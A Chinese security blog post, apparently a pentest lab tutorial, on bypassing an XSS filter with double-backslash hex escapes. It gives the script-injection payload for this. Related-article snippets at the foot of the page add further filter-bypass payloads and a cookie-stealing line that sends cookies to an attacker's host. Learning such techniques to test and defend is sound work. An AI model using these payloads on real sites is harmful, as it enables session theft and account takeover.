【安全】P 4-18 16进制绕过过滤触发XSS

最新推荐文章于 2021-12-06 20:54:32 发布
最新推荐文章于 2021-12-06 20:54:32 发布
阅读量155 收藏
点赞数
分类专栏: 安全大师 文章标签: 网络安全 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Z_David_Z/article/details/113899009
版权

目录

0x01 16进制介绍

十六进制转换有16进制每一位上可以是从小到大为0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F16个大小不同的数,即逢16进1,其中用A,B,C,D,E,F(字母不区分大小写)这六个字母来分别表示10,11,12,13,14,15。
使用python将字符转换为16进制类型。

在这里插入图片描述

0x02 XSS挖掘

构造无害独一字符串,在响应在寻找该字符串。
在这里插入图片描述

0x03 双斜杠+16进制绕过

在这里插入图片描述

0x04 Payload触发XSS

Payload:

 \\x3cscript\\x3ealert(document.domain);\\x3c/script\\x3e

在这里插入图片描述
----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

骆驼实验室
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
16进制绕过过滤触发XSS
一米八多的瑞兹的博客
03-18 635
1. 16进制介绍 十六进制转换有16进制每一位上可以是从小到大为0、1、2、3、4、5、6、7、8、9、A、B、C、D、E、F16个大小不同的数,即逢16进1,其中用A,B,C,D,E,F(字母不区分大小写)这六个字母来分别表示10,11,12,13,14,15。 使用python将字符转换为16进制类型。 2. XSS挖掘 构造无害独一字符串,在响应在寻找该字符串。 双斜杠+16进制绕过 Payload触发XSS Payload: \\x3cscript\\x3ealert(documen
XSS篇——XSS过滤绕过技巧
weixin_50464560的博客
05-07 3478
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以...
[ 常见漏洞篇 ]常见web漏洞总结------XSS绕过方式
qq_51577576的博客
12-06 3471
本文具体写到了常见的XSS绕过方式,间的的介绍了一下修复方式 写的比较细,比较深,需要一定的基础才能看懂,仔细读完 不懂的可以百度查一查或者私信我,相信会有很大收获 目录 一、Xss绕过方式: 1. 前端过滤 2.双写绕过 3. 事件绕过 4. 大小写绕过 5. 注释干扰绕过 6.伪协议绕过 7.空格回车Tab绕过 8. 编码绕过 1. base64编码: 2. JS编码: 3. 十六进制: 4. unicode: 5. HTML实体编码: 6. URL...
XSS漏洞介绍及绕过技术
星落的博客
05-30 1万+
跨站脚本攻击(Cross Site Scriptong),为了不和层叠样式表(Cascading Style Sheels)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面插入恶意Script代码,当用户浏览该页时,嵌入期中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 反射型XSS 存储型XSS DOM型XSS xss盗取cookie 代码 <script>document.location=http://ip/cookie.php?coo..
XSS绕过总结
qq_42990434的博客
05-29 7996
有时候明明有一个xss漏洞,但是却有xss过滤规则或者WAF保护导致我们不能成功的利用,这些会屏蔽掉我们的代码,会导致我们执行完代码之后什么反应都没有,这时候我们可以审查一下元素,看看我们的代码有没有替换为空,或者替换成其他东西,或者那些符号被过滤掉了。 比如:我们输入<script> alert(“hi”) </scrip>, 会被转换成<script> alert(>xss detected<) </scrip>,这样的话我们的js语句就不生效
第十六节 unicode绕过过滤触发XSS-01
09-15
Unicode绕过过滤触发XSS-01 Unicode绕过过滤触发XSS是指攻击者通过使用Unicode字符来绕过Web应用程序的输入验证和过滤机制,从而触发跨站脚本(XSS)攻击。下面将详细介绍Unicode绕过过滤触发XSS的原理和实现方法。...
第十二节 利用IE特性绕过XSS过滤-01
09-15
在本节课程中,我们将讨论如何利用 IE 特性绕过 XSS 过滤,并对应不同的 XSS 攻击场景,包括 XSS 漏洞发现、基本 XSS 利用、IE 特性讲解和 Payload 触发 XSSXSS 漏洞发现 XSS 漏洞发现是指在目标网站中查找可能...
第十三节 利用CSS特性绕过XSS过滤-01
最新发布
09-15
Payload的构造需要考虑到目标网站的XSS过滤机制,攻击者需要使用不同的Payload来绕过过滤机制。 利用CSS特性绕过XSS过滤是一种复杂的攻击方式,攻击者需要具备深入的CSS和JavaScript知识,同时也需要具备XSS漏洞...
第十二节 XSS 过滤绕过-01
09-15
XSS 过滤绕过技术详解 ...XSS 过滤绕过技术需要攻击者具备深入的知识和经验,包括 Web 应用程序安全XSS 攻击技术、自动化工具使用等。Web 开发者需要了解这些技术,来防止 XSS 攻击和保护用户信息。
第十节 绕过过滤domain为空的XSS-01
09-15
第十节 绕过过滤domain为空的XSS-01
XSS-Codec XSS代码转换工具
01-14
XSS代码转换工具,用于XSS代码的转换
XSS与字符编码及浏览器解析原理
BerL1n
12-29 1390
time: 2019-05-12 21:27 XSS与字符编码基本介绍: 提起XSS 想到的就是插入字符字符编码与各种解析了!现在介绍一下在xss中最经常用到的编码 html实体编码(10进制与16进制): 如把尖括号编码[ < ] -----> html十进制: < html十六进制:&#x3 c; javascript的八进制跟十六进制: 如把尖括号编码[ < ] -----> js八进制: \74 js十六进制: \x3c jsunicode编码:
XSS 漏洞绕过
白菜执笔人的博客
03-04 2405
Web安全攻防 学习笔记 一、XSS 漏洞 1.1、跳过 Stage #9 在 span 标签中添加 onclick= "alert(document.domain)" (其他关卡也可以这样跳过) 1.2、domain 过滤绕过 首先还是构造特殊无害字符串,响应中寻找字符串观察闭合格式。 双写绕过 "><script>alert(document.dodomain...
xss.haozi 思路总结 0x00-0x12
yukinorong的博客
08-20 1503
xss刷题网站2 https://xss.haozi.me/ 一个非常可爱的网站。这是网站界面,题目序号是十六进制,一共19道题。 0x00 直接输入<script>alert(1)</script> 0x01 先闭合textarea框再实现</textarea><script>alert(1)</script> 0x02 在input...
xss漏洞之进制转换
:)
07-18 447
SQL注入的事件已经是上个世纪最令人头疼的攻击方法,21世纪又出现了HTML注入漏洞,随着web飞速的发展,XSS漏洞已经不容忽视,简单介绍一下XSS漏洞, 只要有用户输入的地方,就会出现XSS漏洞,例如在发表一篇帖子的时候,在其中加入脚本。   1.HTML标签注入:     &lt;script&gt;alert('Hello World!')&lt;/script&gt;   ...
XSS编码问题以及绕过
我不是大牛
07-04 1万+
常用的编码 URL编码:一个百分号和该字符的ASCII编码所对应的2位十六进制数字。 例如“/”的URL编码为%2F # : %23 ; . :%2e ; + :%2b;< :%3c >: %3e ; ! :%21 ; 空格:%20; &: %26; (:%28; ): %29,”:%22,’:%27 常用的编码 HTML实体编码:以&开头,分号结尾的。 例如“<...
XSS注入-简单过滤绕过方法
qq_25899635的博客
05-29 4934
Javascript伪协议触发XSS   将javascript代码添加到客户端的方法是把它放置在伪协议说明符javascript后的URL中。这个特殊的协议类型声明了URL的主体是任意的javascript代码,它由javascript的解释器运行。如果javascript:URL中的javascript代码含有多个语句,必须使用分号将这些语句分隔开。 javascript:var now = ...
XSS绕过技术
热门推荐
suifengshiyu的专栏
03-27 2万+
本文转载自:http://www.2cto.com/Article/201211/168950.html Cross-SiteScripting(XSS)是一类出现在web应用程序上的安全弱点,攻击者可以通过XSS插入一些代码,使得访问页面的其他用户都可以看到,XSS通常是可以被看作漏洞的。它允许攻击者绕过安全机制,通过尝试各种不同的方法插入恶意代码,攻击者可以得到敏感页面的权限,会话,co
XSS 代码总结
bcbobo21cn的专栏
12-08 1万+
XSS跨站测试代码大全 http://www.cnblogs.com/dsky/archive/2012/04/06/2434768.html '>alert(document.cookie) ='>alert(document.cookie) alert(document.cookie) alert(vulnerable) %3Cscript%3Ealert('XSS')%3
xss 空格过滤绕过
07-27
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过在网页中注入恶意脚本来获取用户的敏感信息或执行恶意操作。为了防止XSS攻击,通常会对用户输入的内容进行过滤和转义处理。 在绕过空格过滤的情况下,攻击者可以尝试以下方法绕过安全措施: 1. 使用HTML实体编码:攻击者可以使用HTML实体编码来绕过空格过滤。例如,将空格字符替换为其对应的HTML实体编码(例如,将空格替换为` `或` `)。 2. 使用特殊字符:攻击者可以使用特殊字符来绕过空格过滤。例如,使用不可见字符、全角空格或其他类似的字符。 3. 绕过过滤器规则:攻击者可以尝试绕过已实施的过滤器规则。这可能需要对输入进行深入了解,并找到规则中的漏洞或限制。 重要的是要意识到,绕过空格过滤只是XSS攻击的一种方式,还有其他许多方法可以进行XSS攻击。为了保护网站免受XSS攻击,建议采取综合的安全措施,包括输入验证、输出编码、内容安全策略等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值